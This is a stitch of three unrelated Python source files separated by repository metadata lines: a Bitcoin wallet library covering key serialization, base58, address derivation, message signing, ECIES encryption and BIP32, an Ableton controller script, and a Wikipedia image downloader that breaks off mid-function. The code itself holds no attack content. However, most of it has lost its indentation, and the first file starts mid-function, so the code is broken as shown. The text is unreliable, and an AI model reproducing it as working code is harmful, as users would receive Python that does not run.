# 0x00 = point at infinity, 0x02 and 0x03 = compressed, 0x04 = uncompressed
# compressed keys: <sign> <x> where <sign> is 0x02 if y is even and 0x03 if y is odd
if compressed:
if pubkey.point.y() & 1:
key = '03' + '%064x' % pubkey.point.x()
else:
key = '02' + '%064x' % pubkey.point.x()
else:
key = '04' + \
'%064x' % pubkey.point.x() + \
'%064x' % pubkey.point.y()
return bfh(key)
# end pywallet openssl private key implementation
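# Minimal illustrative sketch (not used elsewhere in this module): the
# serialized sizes implied by the notes inside i2o_ECPublicKey -- 33 bytes
# compressed, 65 bytes uncompressed. The private key bytes are a made-up value.
def _example_pubkey_serialization_lengths():
    pubkey = EC_KEY(b'\x01' * 32).pubkey
    assert len(i2o_ECPublicKey(pubkey, compressed=True)) == 33
    assert len(i2o_ECPublicKey(pubkey, compressed=False)) == 65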
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(sha256(public_key))
return md.digest()
except BaseException:
from . import ripemd
md = ripemd.new(sha256(public_key))
return md.digest()
def hash160_to_b58_address(h160, addrtype, witness_program_version=1):
s = bytes([addrtype])
s += h160
return base_encode(s+Hash(s)[0:4], base=58)
def b58_address_to_hash160(addr):
addr = to_bytes(addr, 'ascii')
_bytes = base_decode(addr, 25, base=58)
return _bytes[0], _bytes[1:21]
def hash160_to_p2pkh(h160):
return hash160_to_b58_address(h160, NetworkConstants.ADDRTYPE_P2PKH)
def hash160_to_p2sh(h160):
return hash160_to_b58_address(h160, NetworkConstants.ADDRTYPE_P2SH)
def public_key_to_p2pkh(public_key):
return hash160_to_p2pkh(hash_160(public_key))
def hash_to_segwit_addr(h):
return segwit_addr.encode(NetworkConstants.SEGWIT_HRP, 0, h)
def public_key_to_p2wpkh(public_key):
return hash_to_segwit_addr(hash_160(public_key))
def script_to_p2wsh(script):
return hash_to_segwit_addr(sha256(bfh(script)))
def p2wpkh_nested_script(pubkey):
pkh = bh2u(hash_160(bfh(pubkey)))
return '00' + push_script(pkh)
def p2wsh_nested_script(witness_script):
wsh = bh2u(sha256(bfh(witness_script)))
return '00' + push_script(wsh)
def pubkey_to_address(txin_type, pubkey):
if txin_type == 'p2pkh':
return public_key_to_p2pkh(bfh(pubkey))
elif txin_type == 'p2wpkh':
return hash_to_segwit_addr(hash_160(bfh(pubkey)))
elif txin_type == 'p2wpkh-p2sh':
scriptSig = p2wpkh_nested_script(pubkey)
return hash160_to_p2sh(hash_160(bfh(scriptSig)))
else:
raise NotImplementedError(txin_type)
def redeem_script_to_address(txin_type, redeem_script):
if txin_type == 'p2sh':
return hash160_to_p2sh(hash_160(bfh(redeem_script)))
elif txin_type == 'p2wsh':
return script_to_p2wsh(redeem_script)
elif txin_type == 'p2wsh-p2sh':
scriptSig = p2wsh_nested_script(redeem_script)
return hash160_to_p2sh(hash_160(bfh(scriptSig)))
else:
raise NotImplementedError(txin_type)
def script_to_address(script):
from .transaction import get_address_from_output_script
t, addr = get_address_from_output_script(bfh(script))
assert t == TYPE_ADDRESS
return addr
def address_to_script(addr):
witver, witprog = segwit_addr.decode(NetworkConstants.SEGWIT_HRP, addr)
if witprog is not None:
assert (0 <= witver <= 16)
OP_n = witver + 0x50 if witver > 0 else 0
script = bh2u(bytes([OP_n]))
script += push_script(bh2u(bytes(witprog)))
return script
addrtype, hash_160 = b58_address_to_hash160(addr)
if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
script = '76a9' # op_dup, op_hash_160
script += push_script(bh2u(hash_160))
script += '88ac' # op_equalverify, op_checksig
elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
script = 'a9' # op_hash_160
script += push_script(bh2u(hash_160))
script += '87' # op_equal
else:
raise BaseException('unknown address type')
return script
def address_to_scripthash(addr):
script = address_to_script(addr)
return script_to_scripthash(script)
def script_to_scripthash(script):
h = sha256(bytes.fromhex(script))[0:32]
return bh2u(bytes(reversed(h)))
def public_key_to_p2pk_script(pubkey):
script = push_script(pubkey)
script += 'ac' # op_checksig
return script
__b58chars = b'123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
assert len(__b58chars) == 58
__b43chars = b'0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$*+-./:'
assert len(__b43chars) == 43
def base_encode(v, base):
""" encode v, which is a string of bytes, to base58."""
assert_bytes(v)
assert base in (58, 43)
chars = __b58chars
if base == 43:
chars = __b43chars
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * c
result = bytearray()
while long_value >= base:
div, mod = divmod(long_value, base)
result.append(chars[mod])
long_value = div
result.append(chars[long_value])
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == 0x00:
nPad += 1
else:
break
result.extend([chars[0]] * nPad)
result.reverse()
return result.decode('ascii')
def base_decode(v, length, base):
""" decode v into a string of len bytes."""
# assert_bytes(v)
v = to_bytes(v, 'ascii')
assert base in (58, 43)
chars = __b58chars
if base == 43:
chars = __b43chars
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += chars.find(bytes([c])) * (base**i)
result = bytearray()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result.append(mod)
long_value = div
result.append(long_value)
nPad = 0
for c in v:
if c == chars[0]:
nPad += 1
else:
break
result.extend(b'\x00' * nPad)
if length is not None and len(result) != length:
return None
result.reverse()
return bytes(result)
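# Minimal illustrative sketch (not used elsewhere in this module): leading zero
# bytes survive a base58 round trip as leading '1' characters, as described by
# the leading-zero-compression note in base_encode above.
def _example_base58_leading_zeros():
    encoded = base_encode(b'\x00\x00\x01', base=58)
    assert encoded.startswith('11')
    assert base_decode(encoded, None, base=58) == b'\x00\x00\x01'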
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return base_encode(vchIn + hash[0:4], base=58)
def DecodeBase58Check(psz):
vchRet = base_decode(psz, None, base=58)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
# backwards compat
# extended WIF for segwit (used in 3.0.x; but still used internally)
SCRIPT_TYPES = {
'p2pkh':0,
'p2wpkh':1,
'p2wpkh-p2sh':2,
'p2sh':5,
'p2wsh':6,
'p2wsh-p2sh':7
}
def serialize_privkey(secret, compressed, txin_type, internal_use=False):
if internal_use:
prefix = bytes([(SCRIPT_TYPES[txin_type] + NetworkConstants.WIF_PREFIX) & 255])
else:
prefix = bytes([NetworkConstants.WIF_PREFIX])
suffix = b'\01' if compressed else b''
vchIn = prefix + secret + suffix
base58_wif = EncodeBase58Check(vchIn)
if internal_use:
return base58_wif
else:
return '{}:{}'.format(txin_type, base58_wif)
def deserialize_privkey(key):
if is_minikey(key):
return 'p2pkh', minikey_to_private_key(key), True
txin_type = None
if ':' in key:
txin_type, key = key.split(sep=':', maxsplit=1)
assert txin_type in SCRIPT_TYPES
vch = DecodeBase58Check(key)
if not vch:
raise BaseException("cannot deserialize", key)
if txin_type is None:
# keys exported in version 3.0.x encoded script type in first byte
txin_type = inv_dict(SCRIPT_TYPES)[vch[0] - NetworkConstants.WIF_PREFIX]
else:
assert vch[0] == NetworkConstants.WIF_PREFIX
assert len(vch) in [33, 34]
compressed = len(vch) == 34
return txin_type, vch[1:33], compressed
def regenerate_key(pk):
assert len(pk) == 32
return EC_KEY(pk)
def GetPubKey(pubkey, compressed=False):
return i2o_ECPublicKey(pubkey, compressed)
def GetSecret(pkey):
return bfh('%064x' % pkey.secret)
def is_compressed(sec):
return deserialize_privkey(sec)[2]
def public_key_from_private_key(pk, compressed):
pkey = regenerate_key(pk)
public_key = GetPubKey(pkey.pubkey, compressed)
return bh2u(public_key)
def address_from_private_key(sec):
txin_type, privkey, compressed = deserialize_privkey(sec)
public_key = public_key_from_private_key(privkey, compressed)
return pubkey_to_address(txin_type, public_key)
def is_segwit_address(addr):
try:
witver, witprog = segwit_addr.decode(NetworkConstants.SEGWIT_HRP, addr)
except Exception as e:
return False
return witprog is not None
def is_b58_address(addr):
try:
addrtype, h = b58_address_to_hash160(addr)
except Exception as e:
return False
if addrtype not in [NetworkConstants.ADDRTYPE_P2PKH, NetworkConstants.ADDRTYPE_P2SH]:
return False
return addr == hash160_to_b58_address(h, addrtype)
def is_address(addr):
return is_segwit_address(addr) or is_b58_address(addr)
def is_private_key(key):
try:
k = deserialize_privkey(key)
return k is not False
except:
return False
########### end pywallet functions #######################
def is_minikey(text):
# Minikeys are typically 22 or 30 characters, but this routine
# permits any length of 20 or more provided the minikey is valid.
# A valid minikey must begin with an 'S', be in base58, and when
# suffixed with '?' have its SHA256 hash begin with a zero byte.
# They are widely used in Casascius physical bitcoins.
return (len(text) >= 20 and text[0] == 'S'
and all(ord(c) in __b58chars for c in text)
and sha256(text + '?')[0] == 0x00)
def minikey_to_private_key(text):
return sha256(text)
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
def msg_magic(message):
length = bfh(var_int(len(message)))
return b"\x18Bitcoin Signed Message:\n" + length + message
def verify_message(address, sig, message):
assert_bytes(sig, message)
try:
h = Hash(msg_magic(message))
public_key, compressed = pubkey_from_signature(sig, h)
# check public key using the address
pubkey = point_to_ser(public_key.pubkey.point, compressed)
for txin_type in ['p2pkh','p2wpkh','p2wpkh-p2sh']:
addr = pubkey_to_address(txin_type, bh2u(pubkey))
if address == addr:
break
else:
raise Exception("Bad signature")
# check message
public_key.verify_digest(sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def encrypt_message(message, pubkey, magic=b'BIE1'):
return EC_KEY.encrypt_message(message, bfh(pubkey), magic)
def chunks(l, n):
return [l[i:i+n] for i in range(0, len(l), n)]
def ECC_YfromX(x,curved=curve_secp256k1, odd=True):
_p = curved.p()
_a = curved.a()
_b = curved.b()
for offset in range(128):
Mx = x + offset
My2 = pow(Mx, 3, _p) + _a * pow(Mx, 2, _p) + _b % _p
My = pow(My2, (_p+1)//4, _p )
if curved.contains_point(Mx,My):
if odd == bool(My&1):
return [My,offset]
return [_p-My,offset]
raise Exception('ECC_YfromX: No Y found')
def negative_point(P):
return Point( P.curve(), P.x(), -P.y(), P.order() )
def point_to_ser(P, comp=True ):
if comp:
return bfh( ('%02x'%(2+(P.y()&1)))+('%064x'%P.x()) )
return bfh( '04'+('%064x'%P.x())+('%064x'%P.y()) )
def ser_to_point(Aser):
curve = curve_secp256k1
generator = generator_secp256k1
_r = generator.order()
assert Aser[0] in [0x02, 0x03, 0x04]
if Aser[0] == 0x04:
return Point( curve, string_to_number(Aser[1:33]), string_to_number(Aser[33:]), _r )
Mx = string_to_number(Aser[1:])
return Point( curve, Mx, ECC_YfromX(Mx, curve, Aser[0] == 0x03)[0], _r )
class MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
from . import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid//2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
R = Point(curveFp, x, y, order)
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
Q = inv_r * ( s * R + minus_e * G )
return klass.from_public_point( Q, curve )
def pubkey_from_signature(sig, h):
if len(sig) != 65:
raise Exception("Wrong encoding")
nV = sig[0]
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
return MyVerifyingKey.from_signature(sig[1:], recid, h, curve = SECP256k1), compressed
class MySigningKey(ecdsa.SigningKey):
"""Enforce low S values in signatures"""
def sign_number(self, number, entropy=None, k=None):
curve = SECP256k1
G = curve.generator
order = G.order()
r, s = ecdsa.SigningKey.sign_number(self, number, entropy, k)
if s > order//2:
s = order - s
return r, s
class EC_KEY(object):
def __init__( self, k ):
secret = string_to_number(k)
self.pubkey = ecdsa.ecdsa.Public_key( generator_secp256k1, generator_secp256k1 * secret )
self.privkey = ecdsa.ecdsa.Private_key( self.pubkey, secret )
self.secret = secret
def get_public_key(self, compressed=True):
return bh2u(point_to_ser(self.pubkey.point, compressed))
def sign(self, msg_hash):
private_key = MySigningKey.from_secret_exponent(self.secret, curve = SECP256k1)
public_key = private_key.get_verifying_key()
signature = private_key.sign_digest_deterministic(msg_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_string)
assert public_key.verify_digest(signature, msg_hash, sigdecode = ecdsa.util.sigdecode_string)
return signature
def sign_message(self, message, is_compressed):
message = to_bytes(message, 'utf8')
signature = self.sign(Hash(msg_magic(message)))
for i in range(4):
sig = bytes([27 + i + (4 if is_compressed else 0)]) + signature
try:
self.verify_message(sig, message)
return sig
except Exception as e:
continue
else:
raise Exception("error: cannot sign message")
def verify_message(self, sig, message):
assert_bytes(message)
h = Hash(msg_magic(message))
public_key, compressed = pubkey_from_signature(sig, h)
# check public key
if point_to_ser(public_key.pubkey.point, compressed) != point_to_ser(self.pubkey.point, compressed):
raise Exception("Bad signature")
# check message
public_key.verify_digest(sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
# ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
@classmethod
def encrypt_message(self, message, pubkey, magic=b'BIE1'):
assert_bytes(message)
pk = ser_to_point(pubkey)
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, pk.x(), pk.y()):
raise Exception('invalid pubkey')
ephemeral_exponent = number_to_string(ecdsa.util.randrange(pow(2,256)), generator_secp256k1.order())
ephemeral = EC_KEY(ephemeral_exponent)
ecdh_key = point_to_ser(pk * ephemeral.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = bfh(ephemeral.get_public_key(compressed=True))
encrypted = magic + ephemeral_pubkey + ciphertext
mac = hmac.new(key_m, encrypted, hashlib.sha256).digest()
return base64.b64encode(encrypted + mac)
def decrypt_message(self, encrypted, magic=b'BIE1'):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic_found = encrypted[:4]
ephemeral_pubkey = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
raise Exception('invalid ciphertext: invalid magic bytes')
try:
ephemeral_pubkey = ser_to_point(ephemeral_pubkey)
except AssertionError as e:
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ephemeral_pubkey.x(), ephemeral_pubkey.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ecdh_key = point_to_ser(ephemeral_pubkey * self.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac.new(key_m, encrypted[:-32], hashlib.sha256).digest():
raise InvalidPassword()
return aes_decrypt_with_iv(key_e, iv, ciphertext)
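# Minimal illustrative sketch (not used elsewhere in this module): an ECIES
# encrypt/decrypt round trip using the helpers above (AES-128-CBC + HMAC-SHA256
# as noted in the comment preceding encrypt_message). The private key bytes are
# a made-up example value, not a real secret.
def _example_ecies_roundtrip():
    ec_key = EC_KEY(b'\x05' * 32)
    token = encrypt_message(b'hello', ec_key.get_public_key(compressed=True))
    assert ec_key.decrypt_message(token) == b'hello'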
###################################### BIP32 ##############################
random_seed = lambda n: "%032x"%ecdsa.util.randrange( pow(2,n) )
BIP32_PRIME = 0x80000000
def get_pubkeys_from_secret(secret):
# public key
private_key = ecdsa.SigningKey.from_string( secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
K = public_key.to_string()
K_compressed = GetPubKey(public_key.pubkey,True)
return K, K_compressed
# Child private key derivation function (from master private key)
# k = master private key (32 bytes)
# c = master chain code (extra entropy for key derivation) (32 bytes)
# n = the index of the key we want to derive. (only 32 bits will be used)
# If n is negative (i.e. the 32nd bit is set), the resulting private key's
# corresponding public key can NOT be determined without the master private key.
# However, if n is positive, the resulting private key's corresponding
# public key can be determined without the master private key.
def CKD_priv(k, c, n):
is_prime = n & BIP32_PRIME
return _CKD_priv(k, c, bfh(rev_hex(int_to_hex(n,4))), is_prime)
def _CKD_priv(k, c, s, is_prime):
order = generator_secp256k1.order()
keypair = EC_KEY(k)
cK = GetPubKey(keypair.pubkey,True)
data = bytes([0]) + k + s if is_prime else cK + s
I = hmac.new(c, data, hashlib.sha512).digest()
k_n = number_to_string( (string_to_number(I[0:32]) + string_to_number(k)) % order , order )
c_n = I[32:]
return k_n, c_n
# Child public key derivation function (from public key only)
# K = master public key
# c = master chain code
# n = index of key we want to derive
# This function allows us to find the nth public key, as long as n is
# non-negative. If n is negative, we need the master private key to find it.
def CKD_pub(cK, c, n):
if n & BIP32_PRIME: raise
return _CKD_pub(cK, c, bfh(rev_hex(int_to_hex(n,4))))
# helper function, callable with arbitrary string
def _CKD_pub(cK, c, s):
order = generator_secp256k1.order()
I = hmac.new(c, cK + s, hashlib.sha512).digest()
curve = SECP256k1
pubkey_point = string_to_number(I[0:32])*curve.generator + ser_to_point(cK)
public_key = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
c_n = I[32:]
cK_n = GetPubKey(public_key.pubkey,True)
return cK_n, c_n
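# Minimal illustrative sketch (not used elsewhere in this module): for a
# non-hardened index, CKD_priv and CKD_pub derived from the same parent agree,
# which is the property described in the comments above. The master key and
# chain code below are made-up example bytes.
def _example_ckd_consistency(index=0):
    master_k, master_c = b'\x07' * 32, b'\x0b' * 32
    _, master_cK = get_pubkeys_from_secret(master_k)
    child_k, child_c = CKD_priv(master_k, master_c, index)
    child_cK, child_c_pub = CKD_pub(master_cK, master_c, index)
    assert child_c == child_c_pub
    assert GetPubKey(EC_KEY(child_k).pubkey, True) == child_cK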
def xprv_header(xtype):
return bfh("%08x" % NetworkConstants.XPRV_HEADERS[xtype])
def xpub_header(xtype):
return bfh("%08x" % NetworkConstants.XPUB_HEADERS[xtype])
def serialize_xprv(xtype, c, k, depth=0, fingerprint=b'\x00'*4, child_number=b'\x00'*4):
xprv = xprv_header(xtype) + bytes([depth]) + fingerprint + child_number + c + bytes([0]) + k
return EncodeBase58Check(xprv)
def serialize_xpub(xtype, c, cK, depth=0, fingerprint=b'\x00'*4, child_number=b'\x00'*4):
xpub = xpub_header(xtype) + bytes([depth]) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
def deserialize_xkey(xkey, prv):
xkey = DecodeBase58Check(xkey)
if len(xkey) != 78:
raise BaseException('Invalid length')
depth = xkey[4]
fingerprint = xkey[5:9]
child_number = xkey[9:13]
c = xkey[13:13+32]
header = int('0x' + bh2u(xkey[0:4]), 16)
headers = NetworkConstants.XPRV_HEADERS if prv else NetworkConstants.XPUB_HEADERS
if header not in headers.values():
raise BaseException('Invalid xpub format', hex(header))
xtype = list(headers.keys())[list(headers.values()).index(header)]
n = 33 if prv else 32
K_or_k = xkey[13+n:]
return xtype, depth, fingerprint, child_number, c, K_or_k
def deserialize_xpub(xkey):
return deserialize_xkey(xkey, False)
def deserialize_xprv(xkey):
return deserialize_xkey(xkey, True)
def xpub_type(x):
return deserialize_xpub(x)[0]
def is_xpub(text):
try:
deserialize_xpub(text)
return True
except:
return False
def is_xprv(text):
try:
deserialize_xprv(text)
return True
except:
return False
def xpub_from_xprv(xprv):
xtype, depth, fingerprint, child_number, c, k = deserialize_xprv(xprv)
K, cK = get_pubkeys_from_secret(k)
return serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
def bip32_root(seed, xtype):
I = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
master_k = I[0:32]
master_c = I[32:]
K, cK = get_pubkeys_from_secret(master_k)
xprv = serialize_xprv(xtype, master_c, master_k)
xpub = serialize_xpub(xtype, master_c, cK)
return xprv, xpub
def xpub_from_pubkey(xtype, cK):
assert cK[0] in [0x02, 0x03]
return serialize_xpub(xtype, b'\x00'*32, cK)
def bip32_derivation(s):
assert s.startswith('m/')
s = s[2:]
for n in s.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
yield i
def is_bip32_derivation(x):
try:
[ i for i in bip32_derivation(x)]
return True
except :
return False
def bip32_private_derivation(xprv, branch, sequence):
assert sequence.startswith(branch)
if branch == sequence:
return xprv, xpub_from_xprv(xprv)
xtype, depth, fingerprint, child_number, c, k = deserialize_xprv(xprv)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
parent_k = k
k, c = CKD_priv(k, c, i)
depth += 1
_, parent_cK = get_pubkeys_from_secret(parent_k)
fingerprint = hash_160(parent_cK)[0:4]
child_number = bfh("%08X"%i)
K, cK = get_pubkeys_from_secret(k)
xpub = serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
xprv = serialize_xprv(xtype, c, k, depth, fingerprint, child_number)
return xprv, xpub
def bip32_public_derivation(xpub, branch, sequence):
xtype, depth, fingerprint, child_number, c, cK = deserialize_xpub(xpub)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n)
parent_cK = cK
cK, c = CKD_pub(cK, c, i)
depth += 1
fingerprint = hash_160(parent_cK)[0:4]
child_number = bfh("%08X"%i)
return serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
def bip32_private_key(sequence, k, chain):
for i in sequence:
k, chain = CKD_priv(k, chain, i)
return k
| mit | -8,091,787,089,612,618,000 | 30.569392 | 133 | 0.616814 | false |
jim-cooley/abletonremotescripts | remote-scripts/branches/VCM600_XL/DeviceComponent.py | 1 | 2728 | #Embedded file name: /Users/versonator/Jenkins/live/Binary/Core_Release_64_static/midi-remote-scripts/Launch_Control_XL/DeviceComponent.py
import Live
from _Framework.Control import control_list, ButtonControl
from _Framework.DeviceComponent import DeviceComponent as DeviceComponentBase
from _Framework.ModesComponent import EnablingModesComponent, tomode
class DeviceComponent(DeviceComponentBase):
parameter_lights = control_list(ButtonControl, control_count=8, enabled=False, color='Device.Parameters', disabled_color='Device.NoDevice')
prev_device_button = ButtonControl(color='DefaultButton.On')
next_device_button = ButtonControl(color='DefaultButton.On')
@prev_device_button.pressed
def prev_device_button(self, button):
self._scroll_device_view(Live.Application.Application.View.NavDirection.left)
@next_device_button.pressed
def next_device_button(self, button):
self._scroll_device_view(Live.Application.Application.View.NavDirection.right)
def _scroll_device_view(self, direction):
self.application().view.show_view('Detail')
self.application().view.show_view('Detail/DeviceChain')
self.application().view.scroll_view(direction, 'Detail/DeviceChain', False)
def set_device(self, device):
super(DeviceComponent, self).set_device(device)
for light in self.parameter_lights:
light.enabled = bool(device)
def set_bank_buttons(self, buttons):
for button in buttons or []:
if button:
button.set_on_off_values('Device.BankSelected', 'Device.BankUnselected')
super(DeviceComponent, self).set_bank_buttons(buttons)
def _is_banking_enabled(self):
return True
class DeviceModeComponent(EnablingModesComponent):
device_mode_button = ButtonControl()
def __init__(self, device_settings_mode = None, *a, **k):
super(DeviceModeComponent, self).__init__(*a, **k)
        assert device_settings_mode is not None
self._device_settings_mode = tomode(device_settings_mode)
@device_mode_button.released_immediately
def device_mode_button(self, button):
self.cycle_mode()
@device_mode_button.pressed_delayed
def device_mode_button(self, button):
self.selected_mode = 'enabled'
self._device_settings_mode.enter_mode()
@device_mode_button.released_delayed
def device_mode_button(self, button):
self._device_settings_mode.leave_mode()
def _update_buttons(self, selected_mode):
self.device_mode_button.color = 'DefaultButton.On' if selected_mode == 'enabled' else 'DefaultButton.Off'
super(DeviceModeComponent, self)._update_buttons(selected_mode) | apache-2.0 | -9,198,484,748,923,867,000 | 41.640625 | 143 | 0.715176 | false |
cscott/wikiserver | OLD/tools/get_images.py | 1 | 9366 | from __future__ import with_statement
import re
#import server
import md5
import urllib
import collections
import os
import subprocess
BASEWORD = r"Image"
BASE_URL="http://upload.wikimedia.org/wikipedia/commons"
def get_source_url(filename):
return "%s/%s" % (BASE_URL, get_endpath(filename))
def get_dirs(filename):
m = md5.new()
m.update(filename)
h = m.hexdigest()
return (h[0], h[:2])
def get_endpath(filename):
d = get_dirs(filename)
p = "%s/%s/%s" % (d[0], d[1], filename)
return p
def canonicalize_filename(wikiname):
wikiname = wikiname.replace(' ', '_')
wikiname = wikiname[0].upper() + wikiname[1:]
return wikiname
class WorkaroundURLopener(urllib.FancyURLopener):
version = "OLPC_wikislicer/0.1"
urllib._urlopener = WorkaroundURLopener()
def download_image(filename, base_dir):
source = get_source_url(filename)
dirs = get_dirs(filename)
destdir = "%s/%s/%s" % (base_dir, dirs[0], dirs[1])
try:
os.makedirs(destdir)
except:
pass #This just means that destdir already exists
dest = "%s/%s" % (destdir, filename)
try:
urllib.urlretrieve(source,dest)
except:
print "Failed to download " + source
return False
return dest
def make_svg_wrapper(name, width, height):
    s = '<svg xmlns="http://www.w3.org/2000/svg" version="1.2" xmlns:xlink="http://www.w3.org/1999/xlink" width="%(width)i" height="%(height)i" viewBox="0 0 %(width)i %(height)i"><image xlink:href="%(name)s" width="100%%" height="100%%" x="0" y="0"/></svg>' % {'name':name, 'width':width, 'height':height }
return s
def get_dims(path):
try:
p = subprocess.Popen(['identify','-format','%wx%h',path],stdout=subprocess.PIPE)
p.wait()
s = p.stdout.read()
l = s.split('x')
return (int(l[0]), int(l[1]))
except:
print "Failed to get dims"
return False
def download_and_process(imgdict, base_dir, thumb_width):
for wikiname in imgdict:
filename = canonicalize_filename(wikiname)
d = download_image(filename, base_dir)
if d:
width = None
height= None
for p in imgdict[wikiname]:
if p.width is not None:
width = max(width, p.width)
elif p.thumbnail:
width = max(width, thumb_width)
if p.height is not None:
height = max(height, p.height)
process_image(filename, width, height)
MAXWIDTH=800
MAXHEIGHT=800
def process_image(d, width=None, height=None):
vector = d[-3:].upper() == 'SVG'
if vector:
try:
jpg_name = d + '.jpg'
rsvg_command = ['rsvg-convert','--keep-aspect-ratio','--format=png','--output', jpg_name]
if width is not None:
rsvg_command.append('--width=%i' % width)
if height is not None:
rsvg_command.append('--height=%i' %height)
rsvg_command.append(d)
subprocess.check_call(rsvg_command)
#jpg_name file now contains a png image; we want jpg to save space
subprocess.check_call(['convert', "PNG:%s" % jpg_name, "-quality", "20", "JPEG:%s" % jpg_name])
(width, height) = get_dims(jpg_name)
svg_factor = 0.3 #favorability of SVG
print "Processing vector image " + d
jpg_size = os.stat(jpg_name).st_size
svg_size = svg_factor * os.stat(d).st_size
if svg_size > jpg_size:
print "Replacing svg by a raster wrapper"
endname = jpg_name.split('/')[-1]
s = make_svg_wrapper(endname, width, height)
f = open(d,'w')
f.write(s)
f.truncate()
f.close()
return jpg_size + os.stat(d).st_size
else:
print "Preserving svg as vector"
os.remove(jpg_name)
return os.stat(d).st_size
except:
print "Error: convert failed on " + d
try:
os.remove(d)
os.remove(jpg_name)
except:
print "Error: failed to remove " + d
return 0
else:
print "Processing raster image " + d
try:
if width is None:
width = MAXWIDTH
if height is None:
height = MAXHEIGHT
newsize = "%ix%i>" % (width, height)
subprocess.check_call(['convert', d,"-flatten", "-resize", newsize, "-quality", "20", "JPEG:%s" % d])
print "Succesfully resized " + d
return os.stat(d).st_size
except:
print "Error: convert failed on " + d
try:
os.remove(d)
except:
print "Error: failed to remove " + d
return 0
def process_imagelist(list_filename, base_dir, imgword, maxsize=float('inf')):
with open(list_filename) as f:
print "opened " + list_filename
totalsize = 0 #bytes
searcher = r"\[\[(?:%s|%s):(.+?)\]\]\s+(\d+)\s+(.*?)\s+(.*?)$" % (BASEWORD, imgword)
print searcher
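        # Each input line is expected to look like (illustrative example):
        #   [[Imagen:Foo_bar.svg]] 1234 220 None
        # i.e. a wiki image link, a hit count, then width and height
        # ("None" when that dimension was not specified).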
for line in f.readlines():
m = re.search(searcher, line)
if m is None:
print "WARNING: Match didn't work on " + line
wikiname = m.group(1)
hits = m.group(2)
width = m.group(3)
height = m.group(4)
print wikiname, hits, width, height
if width == 'None':
width = None
else:
width = int(width)
if height == 'None':
height = None
else:
height = int(height)
filename = canonicalize_filename(wikiname)
d = download_image(filename, base_dir)
if d:
s = process_image(d, width, height)
totalsize += s
print d + " occupies " + str(s) + " bytes; running total is " + str(totalsize)
if totalsize > maxsize:
break
class ImageProps:
thumbnail = False
width = None
height = None
upright = False
def __repr__(self):
return "%s (%s, %s) %s" % (self.thumbnail, self.width, self.height, self.upright)
class ImageFinder:
def __init__(self, image_word):
self.word = image_word
self.db = server.WPWikiDB()
def find_images(self, text):
L = []
#pattern = r"\[\[(?:%s|%s):(?P<filename>[^\|\]]+)(?:\|(?P<type>thumb|thumbnail)|(?P<width>\d+)(?:x(?P<height>\d+))?px|(?P<upright>upright)|(?:[^\|\[\]]|\[[^\|\[\]]*\]|\[\[[^\|\[\]]*\]\])*)*\]\]" % (BASEWORD, self.word)
#pattern = r"\[\[(?:%s|%s):(?P<filename>[^\|\]]+)(?P<options>(?:[^\[\]]|\[[^\[\]]*\]|\[\[[^\[\]]*\]\])*)\]\]" % (BASEWORD, self.word)
